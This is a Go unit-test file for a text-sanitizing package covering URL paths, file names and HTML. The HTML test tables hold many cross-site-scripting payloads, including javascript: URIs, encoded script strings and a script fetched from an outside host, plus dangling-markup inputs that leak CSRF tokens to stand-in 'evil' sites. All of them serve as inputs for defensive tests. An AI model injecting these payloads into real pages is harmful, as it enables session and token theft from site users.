You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 

234 lines
11 KiB

  1. // Utility functions for working with text
  2. package sanitize
  3. import (
  4. "testing"
  5. )
  6. var Format = "\ninput: %q\nexpected: %q\noutput: %q"
  7. type Test struct {
  8. input string
  9. expected string
  10. }
  11. // NB the treatment of accents - they are removed and replaced with ascii transliterations
  12. var urls = []Test{
  13. {"ReAd ME.md", `read-me.md`},
  14. {"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`},
  15. {"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`},
  16. {"/../../4-icon.jpg", `/4-icon.jpg`},
  17. {"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`},
  18. {"../4 icon.*", `/4-icon.`},
  19. {"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`},
  20. {"../*", `/`},
  21. }
  22. func TestPath(t *testing.T) {
  23. for _, test := range urls {
  24. output := Path(test.input)
  25. if output != test.expected {
  26. t.Fatalf(Format, test.input, test.expected, output)
  27. }
  28. }
  29. }
  30. func BenchmarkPath(b *testing.B) {
  31. for i := 0; i < b.N; i++ {
  32. for _, test := range urls {
  33. output := Path(test.input)
  34. if output != test.expected {
  35. b.Fatalf(Format, test.input, test.expected, output)
  36. }
  37. }
  38. }
  39. }
  40. var fileNames = []Test{
  41. {"ReAd ME.md", `read-me.md`},
  42. {"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`},
  43. {"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`},
  44. {"/../../4-icon.jpg", `4-icon.jpg`},
  45. {"/Images/../4-icon.jpg", `4-icon.jpg`},
  46. {"../4 icon.jpg", `4-icon.jpg`},
  47. {"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`},
  48. }
  49. func TestName(t *testing.T) {
  50. for _, test := range fileNames {
  51. output := Name(test.input)
  52. if output != test.expected {
  53. t.Fatalf(Format, test.input, test.expected, output)
  54. }
  55. }
  56. }
  57. func BenchmarkName(b *testing.B) {
  58. for i := 0; i < b.N; i++ {
  59. for _, test := range fileNames {
  60. output := Name(test.input)
  61. if output != test.expected {
  62. b.Fatalf(Format, test.input, test.expected, output)
  63. }
  64. }
  65. }
  66. }
  67. var baseFileNames = []Test{
  68. {"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`},
  69. {"/../../4-iCoN.jpg", `-4-iCoN-jpg`},
  70. {"And/Or", `And-Or`},
  71. {"Sonic.EXE", `Sonic-EXE`},
  72. {"012: #Fetch for Defaults", `012-Fetch-for-Defaults`},
  73. }
  74. func TestBaseName(t *testing.T) {
  75. for _, test := range baseFileNames {
  76. output := BaseName(test.input)
  77. if output != test.expected {
  78. t.Fatalf(Format, test.input, test.expected, output)
  79. }
  80. }
  81. }
  82. // Test with some malformed or malicious html
  83. // NB because we remove all tokens after a < until the next >
  84. // and do not attempt to parse, we should be safe from invalid html,
  85. // but will sometimes completely empty the string if we have invalid input
  86. // Note we sometimes use " in order to keep things on one line and use the ` character
  87. var htmlTests = []Test{
  88. {`&nbsp;`, " "},
  89. {`&amp;#x000D;`, `&amp;#x000D;`},
  90. {`<invalid attr="invalid"<,<p><p><p><p><p>`, ``},
  91. {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."},
  92. {`FOO&#x000D;ZOO`, "FOO\rZOO"},
  93. {`<script><!--<script </s`, ``},
  94. {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`},
  95. {`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`},
  96. {`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"},
  97. {`Something<br/>Some more`, "Something\nSome more"},
  98. {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""},
  99. {`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`},
  100. {`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`},
  101. {`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`},
  102. {`&lt;iframe src="" attr=""&gt;>>>>>`, `&lt;iframe src="" attr=""&gt;`},
  103. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`},
  104. {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
  105. {`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
  106. {`<IMG SRC="javascript:alert('XSS')" <test`, ``},
  107. {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``},
  108. {`&gt & test &lt`, `&gt; & test &lt;`},
  109. {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
  110. {`&#8220;hello&#8221; it&#8217;s for &#8216;real&#8217;`, `"hello" it's for 'real'`},
  111. {`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  112. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, ``},
  113. {`'';!--"<XSS>=&{()}`, `'';!--"=&amp;{()}`},
  114. {"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"},
  115. // Examples from https://githubengineering.com/githubs-post-csp-journey/
  116. {`<img src='https://example.com/log_csrf?html=`, ``},
  117. {`<img src='https://example.com/log_csrf?html=
  118. <form action="https://example.com/account/public_keys/19023812091023">
  119. ...
  120. <input type="hidden" name="csrf_token" value="some_csrf_token_value">
  121. </form>`, `...`},
  122. {`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
  123. <p>secret</p>`, `secret
  124. `},
  125. {`<form action="https://some-evil-site.com"><button>Click</button><textarea name='
  126. <!-- </textarea> --><!-- '" -->
  127. <form action="/logout">
  128. <input name="authenticity_token" type="hidden" value="secret1">
  129. </form>`, `Click -- `},
  130. }
  131. func TestHTML(t *testing.T) {
  132. for _, test := range htmlTests {
  133. output := HTML(test.input)
  134. if output != test.expected {
  135. t.Fatalf(Format, test.input, test.expected, output)
  136. }
  137. }
  138. }
  139. var htmlTestsAllowing = []Test{
  140. {`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`, `<img>`},
  141. {`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`},
  142. {`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`},
  143. {`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`},
  144. {`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`},
  145. {`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
  146. {`<b>hello world</b>`, `<b>hello world</b>`},
  147. {`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`},
  148. {`&amp;#x000D;`, `&amp;#x000D;`},
  149. {`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`},
  150. {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."},
  151. {"`FOO&#x000D;ZOO", "`FOO&#13;ZOO"},
  152. {`<script><!--<script </s`, ``},
  153. {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`},
  154. {"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?&gt; or <p id=\"0&lt;/p\"> or &lt;&lt;&gt;&lt;@$!@£M&lt;&lt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&gt;***************aaaaaaaaaaaaaaaaaaaaaaaaaa&gt;"},
  155. {`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
  156. {"Something<br/>Some more", `Something<br/>Some more`},
  157. {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a &#39;test&#39; of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.`},
  158. {"<sender ignore=me>John Smith</sender>", `John Smith`},
  159. {"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`},
  160. {"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``},
  161. {`&lt;iframe src="" attr=""&gt;`, `&lt;iframe src=&#34;&#34; attr=&#34;&#34;&gt;`},
  162. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
  163. {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`},
  164. {`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
  165. {`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>&gt;&gt; `},
  166. {`&gt & test &lt`, `&gt; &amp; test &lt;`},
  167. {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`},
  168. {`<img src="data:text/javascript;alert('alert');">`, `<img>`},
  169. {`<iframe src=http://... <`, ``},
  170. {`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``},
  171. {`<img src=javascript:alert(document.cookie)>`, `<img>`},
  172. {`<?php echo('hello world')>`, ``},
  173. {`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`},
  174. {`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`},
  175. {`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`,
  176. `<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`},
  177. {`<a href="javascript:alert(&#39;XSS1&#39;)" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup&#39;);&#34;&gt;XSS<a>`},
  178. {`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write(&#34;UNTRUSTED INPUT: &#34; + document.location.hash); &gt;`},
  179. {`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`},
  180. {`<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`, `<img>`},
  181. {`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`},
  182. {`<IMG SRC="jav&#x09;ascript:alert('XSS');">`, `<img>`},
  183. {`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert(&#39;XSS&#39;);+ADw-/SCRIPT+AD4-`},
  184. {`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;`},
  185. {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`},
  186. {`'';!--"<XSS>=&{()}`, `&#39;&#39;;!--&#34;=&amp;{()}`},
  187. {`<IMG SRC=javascript:alert('XSS')`, ``},
  188. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
  189. {`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  190. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, `<img>`},
  191. }
  192. func TestHTMLAllowed(t *testing.T) {
  193. for _, test := range htmlTestsAllowing {
  194. output, err := HTMLAllowing(test.input)
  195. if err != nil {
  196. t.Fatalf(Format, test.input, test.expected, output, err)
  197. }
  198. if output != test.expected {
  199. t.Fatalf(Format, test.input, test.expected, output)
  200. }
  201. }
  202. }
  203. func BenchmarkHTMLAllowed(b *testing.B) {
  204. for i := 0; i < b.N; i++ {
  205. for _, test := range htmlTestsAllowing {
  206. output, err := HTMLAllowing(test.input)
  207. if err != nil {
  208. b.Fatalf(Format, test.input, test.expected, output, err)
  209. }
  210. if output != test.expected {
  211. b.Fatalf(Format, test.input, test.expected, output)
  212. }
  213. }
  214. }
  215. }